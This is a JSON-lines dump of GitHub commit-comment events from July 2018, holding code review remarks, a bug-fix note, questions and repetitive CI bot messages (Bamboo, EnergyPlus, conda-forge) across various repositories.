{"id":"7934355465","type":"CommitCommentEvent","actor":{"login":"sinacengiz"},"repo":{"name":"sinacengiz/MainTestAutomationpr"},"payload":{"comment":{"id":29634469,"position":null,"line":null,"path":null,"commit_id":"89720252d2adabdf9f9f6c223f53e78a2f653e17","created_at":"2018-07-08T18:13:59Z","updated_at":"2018-07-08T18:13:59Z","author_association":"OWNER","body":"Test runs on java main method"}},"created_at":"2018-07-08T18:13:59Z"}
{"id":"7934355514","type":"CommitCommentEvent","actor":{"login":"naltun"},"repo":{"name":"s0md3v/infinity"},"payload":{"comment":{"id":29634470,"position":null,"line":null,"path":null,"commit_id":"7f20dcdf49cabd5584ea9c46f5c817df27901302","created_at":"2018-07-08T18:14:01Z","updated_at":"2018-07-08T18:14:01Z","author_association":"NONE","body":"What makes this script no longer work?"}},"created_at":"2018-07-08T18:14:01Z"}
{"id":"7934356071","type":"CommitCommentEvent","actor":{"login":"ceball"},"repo":{"name":"pyviz/nbsite"},"payload":{"comment":{"id":29634473,"position":null,"line":null,"path":null,"commit_id":"2b1eb7f5d983a491aad575c6f0afe6aadf34ad98","created_at":"2018-07-08T18:14:27Z","updated_at":"2018-07-08T18:14:27Z","author_association":"CONTRIBUTOR","body":"fqdn here applies to `repo: ioam-docs/nbsite-dev` (the line below fqdn in the diff). That's the dev site, built when a pyviz dev release type tag is pushed.\r\n\r\nIf you expand the diff down a bit you'll see a second github pages section, for release tags."}},"created_at":"2018-07-08T18:14:27Z"}
{"id":"7934356926","type":"CommitCommentEvent","actor":{"login":"lonwillett"},"repo":{"name":"lonwillett/rng-tools"},"payload":{"comment":{"id":29634476,"position":null,"line":null,"path":null,"commit_id":"b59751671baaa7261688265461f44d0dec123d52","created_at":"2018-07-08T18:15:07Z","updated_at":"2018-07-08T18:15:07Z","author_association":"OWNER","body":"This fixes a critical error in \"do_loop\" which prevented entropy source 0 (/dev/hwrng) from ever being used.\r\n\r\nIt also fixes a couple of off-by-one errors, and makes do_loop function more like it was intended (I think)."}},"created_at":"2018-07-08T18:15:07Z"}
{"id":"7934357953","type":"CommitCommentEvent","actor":{"login":"kapillamba4"},"repo":{"name":"kapillamba4/github-bot-testing-playground"},"payload":{"comment":{"id":29634480,"position":null,"line":null,"path":null,"commit_id":"a746c1481d6d4c0f268f9970e583ce8a205c978f","created_at":"2018-07-08T18:15:48Z","updated_at":"2018-07-08T18:15:48Z","author_association":"OWNER","body":"\r\nhttps://github.com/kapillamba4/permalink-bot/blob/71cca8742f3ef4f4aaed3764e385ce6df8386be9/CODE_OF_CONDUCT.md\r\n--\r\n\r\n\r\n"}},"created_at":"2018-07-08T18:15:48Z"}
{"id":"7934359428","type":"CommitCommentEvent","actor":{"login":"kapillamba4"},"repo":{"name":"kapillamba4/github-bot-testing-playground"},"payload":{"comment":{"id":29634485,"position":null,"line":null,"path":null,"commit_id":"a746c1481d6d4c0f268f9970e583ce8a205c978f","created_at":"2018-07-08T18:16:50Z","updated_at":"2018-07-08T18:16:50Z","author_association":"OWNER","body":"https://github.com/kapillamba4/permalink-bot/blob/master/CODE_OF_CONDUCT.md"}},"created_at":"2018-07-08T18:16:50Z"}
{"id":"7934360493","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29634493,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-08T18:17:36Z","updated_at":"2018-07-08T18:17:36Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1676 of 1676 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.33%25-green.png)</a>\n"}},"created_at":"2018-07-08T18:17:36Z"}
{"id":"7934361157","type":"CommitCommentEvent","actor":{"login":"NeoRaider"},"repo":{"name":"freifunk-gluon/gluon"},"payload":{"comment":{"id":29634496,"position":null,"line":null,"path":null,"commit_id":"2493d1c3d22221c5ed83d2ae055b9ebaeca8b281","created_at":"2018-07-08T18:18:04Z","updated_at":"2018-07-08T18:18:04Z","author_association":"MEMBER","body":"I think \"concrete time frame\" conveys what we want to say better (and in terms of Google search results, both expressions are about equally common)."}},"created_at":"2018-07-08T18:18:04Z"}
{"id":"7934363779","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634500,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-08T18:19:54Z","updated_at":"2018-07-08T18:19:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:19:54Z"}
{"id":"7934365022","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634501,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-08T18:20:51Z","updated_at":"2018-07-08T18:20:51Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:20:51Z"}
{"id":"7934365268","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634502,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-08T18:21:05Z","updated_at":"2018-07-08T18:21:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:21:05Z"}
{"id":"7934365418","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634503,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-08T18:21:11Z","updated_at":"2018-07-08T18:21:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:21:11Z"}
{"id":"7934365849","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/ordered-set-feedstock"},"payload":{"comment":{"id":29634504,"position":null,"line":null,"path":null,"commit_id":"4c2bdff51db54233bf2f4e472f7b91a6dc08cf54","created_at":"2018-07-08T18:21:29Z","updated_at":"2018-07-08T18:21:29Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @benjwadams were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @benjwadams were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-08T18:21:29Z"}
{"id":"7934365984","type":"CommitCommentEvent","actor":{"login":"kushagrasinha3596"},"repo":{"name":"kushagrasinha3596/Core-Java"},"payload":{"comment":{"id":29634505,"position":null,"line":null,"path":null,"commit_id":"3b61b622a6d6d1bd7921f4468ee5c5d10bd6e7d9","created_at":"2018-07-08T18:21:36Z","updated_at":"2018-07-08T18:21:36Z","author_association":"OWNER","body":"A simple java program to print \"Hello World\""}},"created_at":"2018-07-08T18:21:36Z"}
{"id":"7934366576","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634506,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-08T18:22:03Z","updated_at":"2018-07-08T18:22:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:22:03Z"}
{"id":"7934366834","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634507,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-08T18:22:15Z","updated_at":"2018-07-08T18:22:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:22:15Z"}
{"id":"7934366885","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634508,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-08T18:22:18Z","updated_at":"2018-07-08T18:22:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:22:18Z"}
{"id":"7934375546","type":"CommitCommentEvent","actor":{"login":"Tangol"},"repo":{"name":"villagedefrance/OpenCart-Overclocked"},"payload":{"comment":{"id":29634532,"position":null,"line":null,"path":null,"commit_id":"17a381658487f744de63575d282a08b85dc2ee19","created_at":"2018-07-08T18:28:38Z","updated_at":"2018-07-08T18:28:38Z","author_association":"NONE","body":"Quick question: Shouldn't the **Online Customers Report** show only the customers that are actually online?\r\nOr does it act like a history of the customers that were online? (if so, for how long do we store this history and what happens if we have hundreds of unique visitors?)\r\n\r\nBecause right now, I have 0 customers online, but when I check the report, I'm seeing the customer that was online 15 minutes ago.\r\n\r\n![online](https://user-images.githubusercontent.com/3336728/42422744-e262bdd2-82f4-11e8-857d-21b075ec9b94.png)\r\n\r\nTested on https://github.com/villagedefrance/OpenCart-Overclocked/commit/e14466e6d3095f0ce0f0308d21a75c67446389e6"}},"created_at":"2018-07-08T18:28:38Z"}
{"id":"7934375900","type":"CommitCommentEvent","actor":{"login":"dariabayanova"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29634534,"position":27,"line":27,"path":"Dodo.Core.Test/CityDepartmentTest.cs","commit_id":"c91732195ff1b6ed5fd60719582e8ccc51541f78","created_at":"2018-07-08T18:28:54Z","updated_at":"2018-07-08T18:28:54Z","author_association":"NONE","body":"Перепутаны аргументы у Assert.Equal"}},"created_at":"2018-07-08T18:28:54Z"}
{"id":"7934376074","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634537,"position":37,"line":37,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"0b9aa2eea3bdf1c8f1f4ee7e9712b41cb9533d63","created_at":"2018-07-08T18:29:02Z","updated_at":"2018-07-08T18:29:02Z","author_association":"OWNER","body":"Надписи капслоком в ресурсах - некомильфо. Лучше в самом TextView выставить атрибут `android:textAllCaps=true`"}},"created_at":"2018-07-08T18:29:02Z"}
{"id":"7934376127","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634538,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-08T18:29:05Z","updated_at":"2018-07-08T18:29:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:29:05Z"}
{"id":"7934376201","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29634539,"position":null,"line":null,"path":null,"commit_id":"f2b161e90d8700c19d92258103c43db6fa426ed6","created_at":"2018-07-08T18:29:08Z","updated_at":"2018-07-08T18:29:08Z","author_association":"MEMBER","body":"@AdSchellevis If you bring this in please enable the new UI as well, stable/18.7 is branched already so that's ok to do"}},"created_at":"2018-07-08T18:29:08Z"}
{"id":"7934376269","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634540,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-08T18:29:10Z","updated_at":"2018-07-08T18:29:10Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:29:10Z"}
{"id":"7934376577","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634541,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-08T18:29:24Z","updated_at":"2018-07-08T18:29:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:29:24Z"}
{"id":"7934377730","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634545,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-08T18:30:16Z","updated_at":"2018-07-08T18:30:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:30:16Z"}
{"id":"7934377853","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634546,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-08T18:30:19Z","updated_at":"2018-07-08T18:30:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:30:19Z"}
{"id":"7934378242","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634548,"position":58,"line":58,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"0b9aa2eea3bdf1c8f1f4ee7e9712b41cb9533d63","created_at":"2018-07-08T18:30:35Z","updated_at":"2018-07-08T18:30:35Z","author_association":"OWNER","body":"Скорее \"заблокирован\" - слово \"забанен\" на сайте вроде не используется."}},"created_at":"2018-07-08T18:30:35Z"}
{"id":"7934378253","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634549,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-08T18:30:35Z","updated_at":"2018-07-08T18:30:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:30:35Z"}
{"id":"7934378333","type":"CommitCommentEvent","actor":{"login":"olivernybroe"},"repo":{"name":"nuwave/lighthouse"},"payload":{"comment":{"id":29634550,"position":null,"line":null,"path":null,"commit_id":"788acc04eb77bf7c9dac7704b5bc43b2d54af893","created_at":"2018-07-08T18:30:39Z","updated_at":"2018-07-08T18:30:39Z","author_association":"CONTRIBUTOR","body":"You can go ahead and PR it, but thanks for asking. "}},"created_at":"2018-07-08T18:30:39Z"}
{"id":"7934379374","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634552,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-08T18:31:24Z","updated_at":"2018-07-08T18:31:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:31:24Z"}
{"id":"7934379499","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634553,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-08T18:31:30Z","updated_at":"2018-07-08T18:31:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:31:30Z"}
{"id":"7934379914","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634554,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-08T18:31:48Z","updated_at":"2018-07-08T18:31:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:31:48Z"}
{"id":"7934380917","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634555,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-08T18:32:32Z","updated_at":"2018-07-08T18:32:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:32:32Z"}
